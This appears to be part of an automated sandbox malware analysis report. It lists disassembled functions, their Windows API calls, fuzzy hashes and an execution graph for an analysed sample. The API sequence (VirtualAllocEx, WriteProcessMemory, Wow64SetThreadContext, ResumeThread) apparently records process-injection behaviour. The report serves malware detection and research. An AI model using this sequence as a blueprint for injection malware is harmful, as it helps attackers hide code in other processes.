                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 9e3998e31948cc430d0fd2e90a7c728c531eb9c4c27eb0c52c98000cb1adf213
                              • Instruction ID: e07663a3518784a1f5c098d7e960871533f1dc05521c916c66296bd47e4ba00e
                              • Opcode Fuzzy Hash: 9e3998e31948cc430d0fd2e90a7c728c531eb9c4c27eb0c52c98000cb1adf213
                              • Instruction Fuzzy Hash: CC41D274C0071CCBEB24DFAAC884BDEBBB5BF48314F60806AD408AB255D7756949CF60
                              Function 0280590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 237 280590c-28059d9 CreateActCtxA 239 28059e2-2805a3c 237->239 240 28059db-28059e1 237->240 247 2805a4b-2805a4f 239->247 248 2805a3e-2805a41 239->248 240->239 249 2805a60-2805a90 247->249 250 2805a51-2805a5d 247->250 248->247 254 2805a42-2805a47 249->254 255 2805a92-2805b14 249->255 250->249 254->247
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 028059C9
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 1a9d8b9183dbb8132aed19240e6e91290784e797ca69a746b256157448ceb168
                              • Instruction ID: a7fc5a6ac09a80d893db03ad6c0ac7413d1426ce5bf8faf50bcf9b41ea4329e2
                              • Opcode Fuzzy Hash: 1a9d8b9183dbb8132aed19240e6e91290784e797ca69a746b256157448ceb168
                              • Instruction Fuzzy Hash: 4641E2B5C0071DCBEB24DFA9C8847DDBBB5BF48314F60806AD408AB254DB75694ACF50
                              Function 048A1578 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 258 48a1578-48a15ce 260 48a15de-48a161d WriteProcessMemory 258->260 261 48a15d0-48a15dc 258->261 263 48a161f-48a1625 260->263 264 48a1626-48a1656 260->264 261->260 263->264
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 048A1610
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: e75233e93a49b2153c2dec083f58c90126fd37d60281f58f8c024a4c96867f52
                              • Instruction ID: 0fa42212bd3f1b518d786aca5ce007276e3269048549a430ff9c97634ee258df
                              • Opcode Fuzzy Hash: e75233e93a49b2153c2dec083f58c90126fd37d60281f58f8c024a4c96867f52
                              • Instruction Fuzzy Hash: B42146B69003499FDB10CFA9C8857EEBBF4FF48310F14882AE959A7241C7789954CBA4
                              Function 048A1580 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 268 48a1580-48a15ce 270 48a15de-48a161d WriteProcessMemory 268->270 271 48a15d0-48a15dc 268->271 273 48a161f-48a1625 270->273 274 48a1626-48a1656 270->274 271->270 273->274
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 048A1610
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: 93a29ebd876666206e443d8c2f5de4229424747d7a5bb95365d09077af889ab3
                              • Instruction ID: a88101db5ad31f06327cc19ad1dfb31f9e3eabd315c7ff44e531d1ff492d2049
                              • Opcode Fuzzy Hash: 93a29ebd876666206e443d8c2f5de4229424747d7a5bb95365d09077af889ab3
                              • Instruction Fuzzy Hash: C3213B759003499FDF10CFAAC8457DEBBF5FF48310F148529E919A7240C7789954CBA5
                              Function 048A1668 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 288 48a1668-48a16fd ReadProcessMemory 291 48a16ff-48a1705 288->291 292 48a1706-48a1736 288->292 291->292
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 048A16F0
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: b7f962fb3e2c4cde6780ceffba8299449a039c66cdd69cc0fa7d7a7ea3b2edda
                              • Instruction ID: 3084a124b2b54e74bda3fd97d46903bb1b833f4f4e3046792d625b31e95cc7ab
                              • Opcode Fuzzy Hash: b7f962fb3e2c4cde6780ceffba8299449a039c66cdd69cc0fa7d7a7ea3b2edda
                              • Instruction Fuzzy Hash: 7B2125B2C003499FDB10CFA9C8847EEBBF5BF48310F14842AE559A7240D77899418B64
                              Function 048A0FA8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 278 48a0fa8-48a0ffb 280 48a100b-48a103b Wow64SetThreadContext 278->280 281 48a0ffd-48a1009 278->281 283 48a103d-48a1043 280->283 284 48a1044-48a1074 280->284 281->280 283->284
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 048A102E
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: 42e5a8229be032924190201fff382552ece0599f052cc54a78d2d3621ebca99a
                              • Instruction ID: e3510450cfbb5e1184a32714f78d38eca8cdf77f00bb31ca9b648d2ba70e7a1d
                              • Opcode Fuzzy Hash: 42e5a8229be032924190201fff382552ece0599f052cc54a78d2d3621ebca99a
                              • Instruction Fuzzy Hash: 7A217976D003488FEB10DFAAC5857EEBBF0EF48310F14842AD559A7240C778AA85CFA5
                              Function 048A1670 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 306 48a1670-48a16fd ReadProcessMemory 309 48a16ff-48a1705 306->309 310 48a1706-48a1736 306->310 309->310
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 048A16F0
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 5a63aa615ca75a7c338be27fba5e33e084b62e4266011fd0437529eac722c3d2
                              • Instruction ID: 8cab3414db90912ee51f2f150f8b940682962b3cf1010eb176ed3facbe47a8d2
                              • Opcode Fuzzy Hash: 5a63aa615ca75a7c338be27fba5e33e084b62e4266011fd0437529eac722c3d2
                              • Instruction Fuzzy Hash: F12125718003499FDB10DFAAC884BEEFBF5FF48310F54842AE519A7240C778A940CBA5
                              Function 048A0FB0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 296 48a0fb0-48a0ffb 298 48a100b-48a103b Wow64SetThreadContext 296->298 299 48a0ffd-48a1009 296->299 301 48a103d-48a1043 298->301 302 48a1044-48a1074 298->302 299->298 301->302
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 048A102E
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: 885fe3d0fd1c0fb87c2cce2b6e00dd9a7a3d99992545421c873fd337e082d1b6
                              • Instruction ID: ad8a698b046f721418c9b1c7c2bad90fad074f308ef20296acfd4b27d6a57203
                              • Opcode Fuzzy Hash: 885fe3d0fd1c0fb87c2cce2b6e00dd9a7a3d99992545421c873fd337e082d1b6
                              • Instruction Fuzzy Hash: 612147759003488FEB10DFAAC4857EFBBF4EF48324F14842AD559A7240C7B8A945CFA5
                              Function 0280D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 314 280d690-280d724 DuplicateHandle 315 280d726-280d72c 314->315 316 280d72d-280d74a 314->316 315->316
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0280D717
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 1f77b5fca41921b7141b36ad517e46062bb9770da2a662cd42c2137ad2f95a24
                              • Instruction ID: 94fe0d39ade08496f38dc17210fc122c76c160ed9f8b6474cb3948370c728bff
                              • Opcode Fuzzy Hash: 1f77b5fca41921b7141b36ad517e46062bb9770da2a662cd42c2137ad2f95a24
                              • Instruction Fuzzy Hash: 8E21D5B9900248DFDB10CFAAD984ADEFBF4FB48314F14845AE918A7350D374A954CFA5
                              Function 0280D689 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 319 280d689-280d724 DuplicateHandle 320 280d726-280d72c 319->320 321 280d72d-280d74a 319->321 320->321
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0280D717
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: bf07dfea81f74981b7dca291c6da91d52cc8159adf2d8ae1f67ec14dfaab6483
                              • Instruction ID: 73ff04d348ff026bbd3ad5783c20a85eac03e1ce37a560644f2ebbf135628fa7
                              • Opcode Fuzzy Hash: bf07dfea81f74981b7dca291c6da91d52cc8159adf2d8ae1f67ec14dfaab6483
                              • Instruction Fuzzy Hash: 5A21E2B9900249DFDB10CFAAD984AEEBBF5FB48314F14806AE918A3250C374A954CF65
                              Function 0280B219 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0280B079,00000800,00000000,00000000), ref: 0280B28A
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: a11d3201851e548cdf1e4130b3b7e9cef010fdfd92be08ea1e40720930b86a26
                              • Instruction ID: 7d4059b05d2948bbad6b70494cc5527c811f9530f7fa492a965681ffb1519342
                              • Opcode Fuzzy Hash: a11d3201851e548cdf1e4130b3b7e9cef010fdfd92be08ea1e40720930b86a26
                              • Instruction Fuzzy Hash: 161126BA9003498FDB10CFAAC884BDEFBF4EB48314F10852AD819A7250C375A545CFA5
                              Function 0280A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0280B079,00000800,00000000,00000000), ref: 0280B28A
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 7d59a8ba8d6a82e18231a03e8ebbcb1d0cf5145f0559764ed4923f58e23e4507
                              • Instruction ID: 58e44bcf2ae733d3611c1cafcff05a2450f90e98d523c8ddd2043c377baccd9d
                              • Opcode Fuzzy Hash: 7d59a8ba8d6a82e18231a03e8ebbcb1d0cf5145f0559764ed4923f58e23e4507
                              • Instruction Fuzzy Hash: 6D1126BA9003489FDB10CF9AD884BEEFBF4EB48314F10846EE519A7240C375A545CFA5
                              Function 048A14B8 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 048A152E
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: fd666dab5c11b8ed95269f9e3a21f53224d512020b88ba53558303a18307c324
                              • Instruction ID: 983a5434cc8ea3b65b5ab57966805ecefc9e86981eb683603ab03a2dd805126d
                              • Opcode Fuzzy Hash: fd666dab5c11b8ed95269f9e3a21f53224d512020b88ba53558303a18307c324
                              • Instruction Fuzzy Hash: 2D1167B68003489FDB11CFA9C8447EEBBF5EF48310F14881AE515A7250C7759650CFA1
                              Function 048A14C0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 048A152E
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: df1777d68607bcdf38858f1d167bb1a8a7b92b4d5b2b101fbbbab957247894ec
                              • Instruction ID: cac1c5f0432e3a80011fe3f5083c66abcc5cc7ef7a20b1d9aece91df2589d5c0
                              • Opcode Fuzzy Hash: df1777d68607bcdf38858f1d167bb1a8a7b92b4d5b2b101fbbbab957247894ec
                              • Instruction Fuzzy Hash: 001137768003489FDB10DFAAC844BEFBBF5EF48320F148819E515A7250C775A550CFA5
                              Function 048A0EFB Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 7306fbbeb764f40f14cff95644eb7eee037c6618b82f798e8dd181bb0a26d107
                              • Instruction ID: 8c4e6f905ec55db165d6456671d70d3dc02d77c9d1d9a36f506c8f623a130f2d
                              • Opcode Fuzzy Hash: 7306fbbeb764f40f14cff95644eb7eee037c6618b82f798e8dd181bb0a26d107
                              • Instruction Fuzzy Hash: 481155B5D003488FEB10DFAAC4457EEFBF4AB48320F24882AD519A7280C778A540CFA5
                              Function 048A0F00 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 360371d1e9ce8782c4b28722510cee0fb6e86db577acee6b54ba3829ae87f76b
                              • Instruction ID: 7a47a4fe029225fee7f54e86a745a7264ca8c2f43ce3c5f2e445191f817ba256
                              • Opcode Fuzzy Hash: 360371d1e9ce8782c4b28722510cee0fb6e86db577acee6b54ba3829ae87f76b
                              • Instruction Fuzzy Hash: EA1128719043488BEB10DFAAC4457EFFBF4AB48324F148459D519A7240C775A544CBA5
                              Function 048A1910 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                              Download Yara Rule
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 048A5345
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: d9b6e7a2265e2e14fcadc51a1a2b838be24109f53cde55d542caee56538332d1
                              • Instruction ID: c06622926ab7db38a37da2fc323f4f869640bf6d1fd38d49ba1e2dab62d0dddd
                              • Opcode Fuzzy Hash: d9b6e7a2265e2e14fcadc51a1a2b838be24109f53cde55d542caee56538332d1
                              • Instruction Fuzzy Hash: 9A113AB58003489FDB10DF99C444BDEFBF4EB48314F108519E518A7300C3B5A544CFA5
                              Function 0280AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0280AFFE
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: a55d18c54267d20809eebcaa590f2cbc9b1c6071c94909829f585312e77380b2
                              • Instruction ID: 783d48ca0c859b09e62802faf6285c5779faa0b9c5ac69d5f2273183534f0b6d
                              • Opcode Fuzzy Hash: a55d18c54267d20809eebcaa590f2cbc9b1c6071c94909829f585312e77380b2
                              • Instruction Fuzzy Hash: EE1113BAC003498FDB10CF9AC844BDEFBF4EB48314F10846AD528A7250C375A545CFA5
                              Function 048A52E3 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                              Download Yara Rule
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 048A5345
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: 9219b98fd1121445475dd2e2bdc69fb098805c1aed80a4ec6009317845064ee2
                              • Instruction ID: 8314312904a54957969a4419dd1baa21aafa4f8309df255cb46a16c657d8037a
                              • Opcode Fuzzy Hash: 9219b98fd1121445475dd2e2bdc69fb098805c1aed80a4ec6009317845064ee2
                              • Instruction Fuzzy Hash: 841103B58002489FEB10CF99D885BEEFBF4EB88310F14851AE518A7250C3B5A984CFA1
                              Function 00C4D4C4 Relevance: .1, Instructions: 75COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000009.00000002.1443480575.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_c4d000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eaa12d84a687a03923bb11db2210eaa70b0ff57d9de5088418b61f642e8e30b7
                              • Instruction ID: 05483ddfcc5b3f05a80293af5176179e2e94a863fdf46f5280de488d28d3b84f
                              • Opcode Fuzzy Hash: eaa12d84a687a03923bb11db2210eaa70b0ff57d9de5088418b61f642e8e30b7
                              • Instruction Fuzzy Hash: 79213AB1504244DFDB15EF10D9C0B26BF65FB84328F20C56DE80A0B256C736D956CBA2
                              Function 00C5D1D4 Relevance: .1, Instructions: 72COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000009.00000002.1443573295.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_c5d000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 35ecbb8282a860e9442ce80100570f39d8f8fc283dc3111899ed70f2fe7f0341
                              • Instruction ID: 109a7b73b873517aa3f401e6a5e5a9c4d0fcc4bd0158caac2e612e9881171763
                              • Opcode Fuzzy Hash: 35ecbb8282a860e9442ce80100570f39d8f8fc283dc3111899ed70f2fe7f0341
                              • Instruction Fuzzy Hash: 12212679504304EFDB25DF10D9C0B26BBA5FB84315F20C5ADEC4A4B292C376DC8ACA66
                              Function 00C5D01C Relevance: .1, Instructions: 72COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000009.00000002.1443573295.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_c5d000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: acee86fb6ddd216ef9d0e26eb83b8d918420f91194ba0a07100d8f68a67c3b33
                              • Instruction ID: 9c6014817411a7875e7651fcf10549dba3f30dad0608c47833c6bbe7822d7b90
                              • Opcode Fuzzy Hash: acee86fb6ddd216ef9d0e26eb83b8d918420f91194ba0a07100d8f68a67c3b33
                              • Instruction Fuzzy Hash: F921D379504304DFDB24DF10D5C4B16BBA5EB84315F20C569EC4A4B296C336D88BCA66
                              Function 00C5D005 Relevance: .1, Instructions: 62COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000009.00000002.1443573295.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_c5d000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 650d2aaf9d14a0ca58d68a131f0a9bea542f5be287f4afe9a5377f2ea25c643f
                              • Instruction ID: d6862d01481bc65f6f1652924ef435f0d34174ffb3fe215a2e0be380d0b506c5
                              • Opcode Fuzzy Hash: 650d2aaf9d14a0ca58d68a131f0a9bea542f5be287f4afe9a5377f2ea25c643f
                              • Instruction Fuzzy Hash: 48218E755093808FDB12CF20D994715BF71EB86314F28C5EAD8498F2A7C33A984ACB62
                              Function 00C4D4BF Relevance: .1, Instructions: 56COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000009.00000002.1443480575.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_c4d000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                              • Instruction ID: 1b87a617bcef0412d203080851575eea98de292c9568fb342bfb992402fe1959
                              • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                              • Instruction Fuzzy Hash: 5011E6B6504280CFCB16DF10D5C4B16BF72FB94318F24C6A9EC4A4B656C336D956CBA1
                              Function 00C5D1CF Relevance: .1, Instructions: 53COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000009.00000002.1443573295.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_c5d000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                              • Instruction ID: 56df0c78485732b5298e16b8908aecf7888e10588b080726782b15da2a175807
                              • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                              • Instruction Fuzzy Hash: EC118E79504340DFDB25CF10D9C4B15BBA1FB84314F24C6ADDC4A4B656C33AD98ACB51

                              Execution Graph

                              Execution Coverage:3.5%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:11.3%
                              Total number of Nodes:964
                              Total number of Limit Nodes:2
                              execution_graph 5376 40fc6c ??1type_info@@UAE 5377 40fc81 5376->5377 5378 40fc7b 5376->5378 5380 40fc2c free 5378->5380 5380->5377 3898 40fd88 __set_app_type __p__fmode __p__commode 3899 40fdf7 3898->3899 3900 40fe0b 3899->3900 3901 40fdff __setusermatherr 3899->3901 3910 40fefe _controlfp 3900->3910 3901->3900 3903 40fe10 _initterm __getmainargs _initterm 3904 40fe64 GetStartupInfoA 3903->3904 3906 40fe98 GetModuleHandleA 3904->3906 3911 407452 3906->3911 3909 40febc exit _XcptFilter 3910->3903 4082 407c53 3911->4082 3913 407464 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4088 40efb5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 3913->4088 3915 407491 4102 408510 3915->4102 3917 4074a1 4122 401b3c 3917->4122 3921 4074b7 6 API calls 3922 407510 WaitForSingleObject 3921->3922 3923 40751c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3921->3923 3922->3923 4131 408e97 RegOpenKeyExA 3923->4131 3925 407538 3926 40755a 3925->3926 3927 40753f ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3925->3927 3929 401289 6 API calls 3926->3929 4134 409132 RegOpenKeyExA 3927->4134 3931 407563 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CreateMutexA GetLastError 3929->3931 3930 407557 3930->3926 3932 407590 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 3931->3932 3933 407598 3931->3933 3932->3909 4137 407d38 LoadLibraryA GetProcAddress 3933->4137 3936 40759d 4142 401000 3936->4142 3940 4075cb ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4181 40f0b5 3940->4181 3944 40760b 3946 401289 6 API calls 3944->3946 3963 40765a 3944->3963 3945 401289 6 API calls 3947 40768c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3945->3947 3948 407620 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3946->3948 3950 407699 3947->3950 3951 40769e 3947->3951 3949 40762d 3948->3949 3948->3963 3954 40765c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 3949->3954 3955 40763d ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 3949->3955 3949->3963 4206 4084b8 CreateProcessA CloseHandle CloseHandle 3950->4206 3952 401289 6 API calls 3951->3952 3956 4076a7 